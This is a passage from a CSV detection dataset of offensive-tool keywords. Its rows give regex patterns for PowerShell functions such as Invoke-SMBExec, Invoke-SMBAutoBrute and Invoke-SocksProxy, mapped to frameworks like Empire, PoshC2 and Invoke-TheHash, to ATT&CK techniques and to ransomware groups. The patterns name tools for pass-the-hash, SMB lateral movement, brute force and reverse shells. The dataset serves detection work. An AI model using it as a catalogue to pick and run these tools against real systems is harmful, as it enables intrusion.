TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","1","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","49644" "*Invoke-SlinkyCat*",".{0,1000}Invoke\-SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","N/A","AD Enumeration","7","1","79","8","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z","49645" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49646" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SMBAutoBrute.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49647" "*Invoke-SMBAutoBrute*",".{0,1000}Invoke\-SMBAutoBrute.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1079","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49648" "*Invoke-SMBAutoBrute.ps1*",".{0,1000}Invoke\-SMBAutoBrute\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - 
T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49649" "*invoke-smbclient *",".{0,1000}invoke\-smbclient\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49650" "*Invoke-SMBClient*",".{0,1000}Invoke\-SMBClient.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - 
TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49651" "*Invoke-SMBClient.ps1*",".{0,1000}Invoke\-SMBClient\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49652" "*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49653" "*Invoke-SMBEnum*",".{0,1000}Invoke\-SMBEnum.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49654" "*invoke-smbexec *",".{0,1000}invoke\-smbexec\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49655" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - 
TA0008","N/A","APT20","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49656" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49657" "*Invoke-SMBExec*",".{0,1000}Invoke\-SMBExec.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49658" "*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","APT20","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49659" "*Invoke-SMBExec.ps1*",".{0,1000}Invoke\-SMBExec\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1093","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49660" "*invoke-smblogin *",".{0,1000}invoke\-smblogin\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - 
T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49661" "*Invoke-SMBLogin.ps1*",".{0,1000}Invoke\-SMBLogin\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49662" "*Invoke-SMBNegotiate -ComputerName localhost*",".{0,1000}Invoke\-SMBNegotiate\s\-ComputerName\slocalhost.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49663" "*Invoke-SMBNegotiate*",".{0,1000}Invoke\-SMBNegotiate.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49664" "*Invoke-SmbObey *",".{0,1000}Invoke\-SmbObey\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49665" "*Invoke-SmbObey.*",".{0,1000}Invoke\-SmbObey\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49666" "*Invoke-SmbOrder *",".{0,1000}Invoke\-SmbOrder\s.{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse 
Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","0","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49667" "*Invoke-SmbOrder.*",".{0,1000}Invoke\-SmbOrder\..{0,1000}","offensive_tool_keyword","smb-reverse-shell","A Reverse Shell which uses an XML file on an SMB share as a communication channel.","T1021.002 - T1027 - T1105","TA0008 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/r1cksec/smb-reverse-shell","1","1","N/A","N/A","10","10","17","0","2024-02-17T12:20:01Z","2022-01-16T21:02:14Z","49668" "*Invoke-SMBRemoting*",".{0,1000}Invoke\-SMBRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49669" "*Invoke-SMBRemoting.ps1*",".{0,1000}Invoke\-SMBRemoting\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","49670" "*Invoke-SMBRemoting.ps1*",".{0,1000}Invoke\-SMBRemoting\.ps1.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","49671" "*Invoke-SMBRemoting-main*",".{0,1000}Invoke\-SMBRemoting\-main.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","N/A","9","2","163","25","2024-12-05T16:30:18Z","2023-09-06T16:00:47Z","49672" "*Invoke-SMBScanner*",".{0,1000}Invoke\-SMBScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - 
CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SmbScanner.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49673" "*Invoke-SmbScanner*",".{0,1000}Invoke\-SmbScanner.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice 
Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-SmbScanner.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49674" "*Invoke-SmbScanner.ps1*",".{0,1000}Invoke\-SmbScanner\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49675" "*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - 
TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49676" "*Invoke-Snaffler*",".{0,1000}Invoke\-Snaffler.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49677" "*invoke-sniffer *",".{0,1000}invoke\-sniffer\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49678" "*Invoke-SocksProxy *",".{0,1000}Invoke\-SocksProxy\s.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","0","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","49679" 